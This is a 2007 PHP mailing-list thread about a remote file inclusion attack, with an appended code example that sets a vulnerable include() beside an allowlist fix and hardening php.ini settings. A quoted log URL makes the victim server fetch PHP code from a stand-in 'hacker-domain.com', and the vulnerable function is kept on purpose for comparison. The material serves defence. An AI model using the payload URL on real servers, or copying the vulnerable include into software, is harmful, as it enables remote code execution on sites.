Turn off all error reporting (in php.ini) so that the error isn't pushed to the screen.

-----Original Message-----
From: Seak, Teng-Fong [mailto:seak.tf@xxxxxxxxxxxx]
Sent: Friday, March 02, 2007 12:16 PM
To: php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx
Subject: [PHP-WIN] Re: Question on virus/worms

Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen
> into Google and got a wealth of information.

Yes, of course! But what I can see there isn't far from useless (cf. what I write below).

Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]

I know these already. The server is using McAfee, so I'm quite familiar with McAfee's VIL. But the information given by these pages isn't enough to let me know what to do and how those viruses/worms managed to get inside.

>> Do they mean anything to anyone of you? Do you know how they've
>> got inside the computer? Is there anything to do to prevent that?
>> Are they known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written
> scripts, over-reliance on scripts downloaded from the web and poor
> server security.
>
> Hope that helps.

No, not really :-(

But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using a URL like this:

http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?

And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction:

include("$page.php");

This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the "poorly written scripts" can help anything unless a total rewrite! And there's no "poor server security" that I can see.

I've installed PHP5 and the problem seems fixed.

However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X

I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that?

By the way, I know there are still a lot of servers out there still using PHP4. Is this vulnerability a known bug? At least, I wasn't aware of that before!

Regards,
Seak
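The include() pattern quoted in the message above, placed beside an allowlist-based replacement and the php.ini settings that keep the warning text out of the browser, as an added example that is not from this thread; the page names, the pages directory and the PHP 7 type hints are assumptions:

```php
<?php
// Added example, not code from the mailing-list thread.
//
// php.ini settings that address both questions in the thread (assumed values):
//   display_errors = Off     ; warning text (with the file path) no longer reaches the browser
//   log_errors = On          ; ... but is still written to the server error log
//   allow_url_fopen = Off    ; PHP 4 / early 5: include() can no longer fetch remote URLs
//   allow_url_include = Off  ; PHP >= 5.2: remote include()/require() stays disabled

// Vulnerable (the pattern from the original message): $page comes straight from
// the query string, so any name, path or URL the visitor supplies is included.
// Kept only for comparison; never call this with user input.
function render_page_vulnerable(string $page): void
{
    include("$page.php");
}

// Hardened: the request may only name a page from a fixed list, and the file
// path is built from a constant directory, so user input never becomes a path.
const PAGES    = ['home', 'about', 'contact'];   // assumed page names
const PAGE_DIR = __DIR__ . '/pages';             // assumed directory of page files

function resolve_page(?string $page): ?string
{
    // Strict comparison: only an exact allowlisted string passes.
    if ($page === null || !in_array($page, PAGES, true)) {
        return null;
    }
    return PAGE_DIR . '/' . $page . '.php';
}

function render_page_safe(?string $page): void
{
    $path = resolve_page($page);
    if ($path === null || !is_file($path)) {
        // Rejected value goes to the server log, not to the visitor.
        error_log('index.php: rejected page parameter ' . var_export($page, true));
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path;
}

render_page_safe($_GET['page'] ?? null);
```

With display_errors off, a rejected request such as the one in the message produces only a 404 and a log entry, while the include() warning with the C:\Inetpub\wwwroot\ path is never sent to the client.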